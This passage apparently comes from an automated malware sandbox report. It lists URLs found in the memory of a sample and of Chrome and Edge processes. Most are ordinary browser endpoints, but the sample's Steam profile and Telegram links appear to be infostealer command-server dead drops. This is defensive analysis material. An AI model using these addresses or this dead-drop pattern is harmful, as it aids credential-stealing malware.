                  Source: IW4WT2.5.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                  Source: msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325263210.00001E90007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325263210.00001E90007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                  Source: chrome.exe, 0000000B.00000003.2234270308.00001E90002B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                  Source: chrome.exe, 0000000B.00000003.2273557452.00001E9001C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2338199611.0000686000904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2234270308.00001E90002B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                  Source: chrome.exe, 0000000B.00000003.2234270308.00001E90002B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard#exps-registration-success-page-urls
                  Source: chrome.exe, 0000000B.00000003.2230479936.0000686000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2230318746.000068600071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                  Source: chrome.exe, 0000000B.00000003.2234270308.00001E90002B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardatures
                  Source: chrome.exe, 0000000B.00000003.2230479936.0000686000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2230318746.000068600071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                  Source: chrome.exe, 0000000B.00000002.2336384617.0000686000238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2338199611.0000686000904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardh
                  Source: chrome.exe, 0000000B.00000002.2338199611.0000686000904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
                  Source: chrome.exe, 0000000B.00000002.2326171667.00001E9000A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2http://www.gstatic.com/generate_204
                  Source: chrome.exe, 0000000B.00000003.2234270308.00001E90002B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                  Source: chrome.exe, 0000000B.00000002.2323842066.00001E9000428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285841265.00001E9002748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285960979.00001E9002764000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                  Source: chrome.exe, 0000000B.00000003.2247562461.00001E9001158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247174729.00001E90003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247628614.00001E900120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                  Source: chrome.exe, 0000000B.00000003.2247562461.00001E9001158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247174729.00001E90003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247628614.00001E900120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                  Source: chrome.exe, 0000000B.00000003.2230479936.0000686000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2230318746.000068600071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                  Source: chrome.exe, 0000000B.00000003.2231166067.000068600087C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2338391369.0000686000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2234270308.00001E90002B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247628614.00001E900120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                  Source: chrome.exe, 0000000B.00000003.2234270308.00001E90002B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload#companion-iph-blocklisted-page-urls
                  Source: chrome.exe, 0000000B.00000003.2230318746.000068600071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                  Source: chrome.exe, 0000000B.00000002.2338391369.0000686000920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
                  Source: chrome.exe, 0000000B.00000002.2338391369.0000686000920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918=
                  Source: chrome.exe, 0000000B.00000002.2338164026.00006860008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                  Source: chrome.exe, 0000000B.00000003.2233552401.00001E90001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                  Source: chrome.exe, 0000000B.00000002.2326962003.00001E9000CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/
                  Source: chrome.exe, 0000000B.00000003.2270461668.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                  Source: chrome.exe, 0000000B.00000002.2323842066.00001E9000428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285841265.00001E9002748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285960979.00001E9002764000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                  Source: chrome.exe, 0000000B.00000003.2270461668.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328786741.00001E900112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                  Source: chrome.exe, 0000000B.00000003.2270461668.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2270461668.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326642438.00001E9000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328786741.00001E900112C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                  Source: msedge.exe, 0000000F.00000002.2472963054.000008C400394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                  Source: msedge.exe, 0000000F.00000002.2472963054.000008C400394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                  Source: Cookies.18.drString found in binary or memory: https://msn.comXID/
                  Source: Cookies.18.drString found in binary or memory: https://msn.comXIDv10
                  Source: chrome.exe, 0000000B.00000002.2324075991.00001E9000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                  Source: chrome.exe, 0000000B.00000002.2325498651.00001E9000858000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324282199.00001E9000558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                  Source: chrome.exe, 0000000B.00000002.2325498651.00001E9000858000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323988973.00001E90004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328244648.00001E9000F70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                  Source: chrome.exe, 0000000B.00000002.2325498651.00001E9000858000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323988973.00001E90004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                  Source: chrome.exe, 0000000B.00000002.2325886446.00001E90009A3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2245026834.00001E9000FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326146786.00001E9000A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                  Source: 000003.log3.16.dr, 2cc80dabc69f58b6_0.16.drString found in binary or memory: https://ntp.msn.com
                  Source: QuotaManager.16.drString found in binary or memory: https://ntp.msn.com/_default
                  Source: 2cc80dabc69f58b6_1.16.dr, 000003.log9.16.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                  Source: 2cc80dabc69f58b6_1.16.dr, 000003.log9.16.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                  Source: QuotaManager.16.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                  Source: msedge.exe, 0000000F.00000002.2472963054.000008C400394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                  Source: chrome.exe, 0000000B.00000003.2285302429.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285121622.00001E9002844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2334359375.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285508925.00001E9002794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                  Source: chrome.exe, 0000000B.00000002.2334628367.00001E90028AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                  Source: chrome.exe, 0000000B.00000003.2285302429.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285121622.00001E9002844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2334359375.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285508925.00001E9002794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                  Source: chrome.exe, 0000000B.00000003.2285302429.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285121622.00001E9002844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2334359375.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285508925.00001E9002794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                  Source: chrome.exe, 0000000B.00000002.2327648335.00001E9000E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328023896.00001E9000EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326345160.00001E9000AC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328055322.00001E9000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328921058.00001E90012A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                  Source: chrome.exe, 0000000B.00000002.2322744149.00001E90000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                  Source: chrome.exe, 0000000B.00000002.2328023896.00001E9000EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328055322.00001E9000F08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                  Source: chrome.exe, 0000000B.00000002.2328023896.00001E9000EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328921058.00001E90012A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                  Source: chrome.exe, 0000000B.00000002.2328023896.00001E9000EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328055322.00001E9000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328921058.00001E90012A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                  Source: chrome.exe, 0000000B.00000002.2328023896.00001E9000EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323430224.00001E90002D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328921058.00001E90012A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                  Source: chrome.exe, 0000000B.00000002.2328023896.00001E9000EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326345160.00001E9000AC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328055322.00001E9000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328921058.00001E90012A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                  Source: chrome.exe, 0000000B.00000002.2322744149.00001E90000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                  Source: chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                  Source: msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                  Source: chrome.exe, 0000000B.00000002.2325886446.00001E90009A3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2245026834.00001E9000FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326146786.00001E9000A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                  Source: chrome.exe, 0000000B.00000003.2247562461.00001E9001158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247174729.00001E90003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247628614.00001E900120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                  Source: chrome.exe, 0000000B.00000002.2326146786.00001E9000A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                  Source: chrome.exe, 0000000B.00000002.2324994448.00001E9000730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2322716389.00001E9000098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://sb.scorecardresearch.com/
                  Source: chrome.exe, 0000000B.00000002.2324994448.00001E9000730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2322744149.00001E90000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325263210.00001E90007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325263210.00001E90007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://srtb.msn.cn/
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://srtb.msn.com/
                  Source: chrome.exe, 0000000B.00000003.2262212583.00001E90002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                  Source: chrome.exe, 0000000B.00000002.2323842066.00001E9000428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285841265.00001E9002748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285960979.00001E9002764000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                  Source: aD7D9fkpII.exe, aD7D9fkpII.exe, 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                  Source: aD7D9fkpII.exe, 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                  Source: aD7D9fkpII.exe, 00000005.00000002.2782446076.0000000004C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: aD7D9fkpII.exe, 00000005.00000002.2782446076.0000000004C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: aD7D9fkpII.exe, 00000005.00000002.2772700161.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                  Source: aD7D9fkpII.exe, 00000005.00000002.2772700161.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/2qW
